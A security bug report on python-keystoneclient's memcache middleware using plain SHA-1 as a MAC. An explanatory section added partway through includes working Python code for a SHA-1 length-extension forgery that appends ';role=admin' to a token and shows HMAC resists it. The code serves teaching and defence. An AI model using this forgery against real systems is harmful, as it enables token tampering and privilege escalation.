Improper use of Hash for MAC
Bug #1191466 reported by Donald Stufft
This bug affects 1 person
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| OpenStack Security Advisory | Invalid | Undecided | Unassigned | |
| python-keystoneclient | Invalid | Undecided | Unassigned | |
Bug Description
I noticed that within python-keystoneclient the memcache_crypt middleware uses a simple sha1 as a MAC. This is bad to do because a general hash function is not designed to work as a MAC and is thus often vulnerable to a number of attacks. I suggest that instead the hmac library in the Python stdlib is used.
The code in question is here:
https:/
Changed in ossa:
status: Incomplete → Invalid
information type: Private Security → Public
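The class of attack the report alludes to, as an added example that is not part of the bug report or of python-keystoneclient's own code: the report does not show the middleware's construction, so this example assumes the "simple sha1" MAC is sha1(key || message). For that construction, anyone who holds one valid tag and knows (or brute-forces) the key length can append data and compute a valid tag for the extended message, because a SHA-1 digest is simply the hash's internal state after the final block. HMAC-SHA1 from the stdlib hmac module, the fix the report suggests, does not have this property. The small SHA-1 implementation below exists only so the hash can be resumed from an arbitrary state; the key and messages are constructed for the demonstration.

```python
import hashlib
import hmac
import struct

# Constructed demo inputs: a hypothetical memcache secret and token payload.
DEMO_KEY = b"s3cr3t-memcache-key"
DEMO_MSG = b"user=alice;role=user"
SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def sha1_padding(total_len):
    """Merkle-Damgard padding SHA-1 appends to a total_len-byte message."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)


def sha1_compress_from(state, data, total_len):
    """Minimal SHA-1 that starts from an arbitrary 5-word state instead of the IV.

    `data` is absorbed and then padded as if the whole stream were total_len bytes,
    so the digest of a 64-byte-aligned prefix can be resumed without knowing the prefix.
    """
    h = list(state)
    buf = data + sha1_padding(total_len)
    for off in range(0, len(buf), 64):
        w = list(struct.unpack(">16I", buf[off:off + 64]))
        for i in range(16, 80):
            w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
        a, b, c, d, e = h
        for i in range(80):
            if i < 20:
                f, k = (b & c) | (~b & d), 0x5A827999
            elif i < 40:
                f, k = b ^ c ^ d, 0x6ED9EBA1
            elif i < 60:
                f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
            else:
                f, k = b ^ c ^ d, 0xCA62C1D6
            tmp = (_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF
            a, b, c, d, e = tmp, a, _rotl(b, 30), c, d
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d, e))]
    return struct.pack(">5I", *h)


def sha1_hex(data):
    """Full SHA-1 from the IV; lets the toy implementation be checked against hashlib."""
    return sha1_compress_from(SHA1_IV, data, len(data)).hex()


def naive_mac(key, msg):
    """The flawed construction assumed here: plain sha1(key || msg)."""
    return hashlib.sha1(key + msg).hexdigest()


def hmac_mac(key, msg):
    """The fix the report suggests: HMAC-SHA1 from the stdlib."""
    return hmac.new(key, msg, hashlib.sha1).hexdigest()


def verify(mac_fn, key, msg, tag):
    """Constant-time tag comparison, as a verifier should always do."""
    return hmac.compare_digest(mac_fn(key, msg), tag)


def forge_extension(tag_hex, orig_msg, key_len, suffix):
    """Length-extension forgery against sha1(key || msg) without knowing the key.

    Returns (forged_msg, forged_tag) with forged_msg = orig_msg || glue || suffix,
    where glue is the padding SHA-1 inserted after key || orig_msg. The attacker
    needs only the key length (assumed known here; in practice it is brute-forced).
    """
    glue = sha1_padding(key_len + len(orig_msg))
    state = struct.unpack(">5I", bytes.fromhex(tag_hex))  # digest == internal state
    total_len = key_len + len(orig_msg) + len(glue) + len(suffix)
    forged_tag = sha1_compress_from(state, suffix, total_len).hex()
    return orig_msg + glue + suffix, forged_tag


def demo(key=DEMO_KEY, msg=DEMO_MSG, suffix=b";role=admin"):
    """Return (naive_accepts_forgery, hmac_accepts_forgery)."""
    naive_tag = naive_mac(key, msg)
    forged_msg, forged_tag = forge_extension(naive_tag, msg, len(key), suffix)
    naive_accepts = verify(naive_mac, key, forged_msg, forged_tag)

    real_hmac = hmac_mac(key, msg)
    forged_msg2, forged_tag2 = forge_extension(real_hmac, msg, len(key), suffix)
    hmac_accepts = verify(hmac_mac, key, forged_msg2, forged_tag2)
    return naive_accepts, hmac_accepts


if __name__ == "__main__":
    print("toy SHA-1 matches hashlib:", sha1_hex(b"abc") == hashlib.sha1(b"abc").hexdigest())
    print("sha1(key||msg) accepts forgery, HMAC accepts forgery:", demo())
```

The forged message carries the glue padding bytes in the middle, which matters only if the consumer parses the payload strictly; many formats (and anything that reads trailing "key=value" pairs) tolerate them. The HMAC half fails because the tag is the output of an outer hash over a key-derived block, so resuming it does not correspond to any HMAC of an extended message.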
Several improvements are being rolled up in a security advisory going out Wednesday. We'll see if this still applies after that one is disclosed.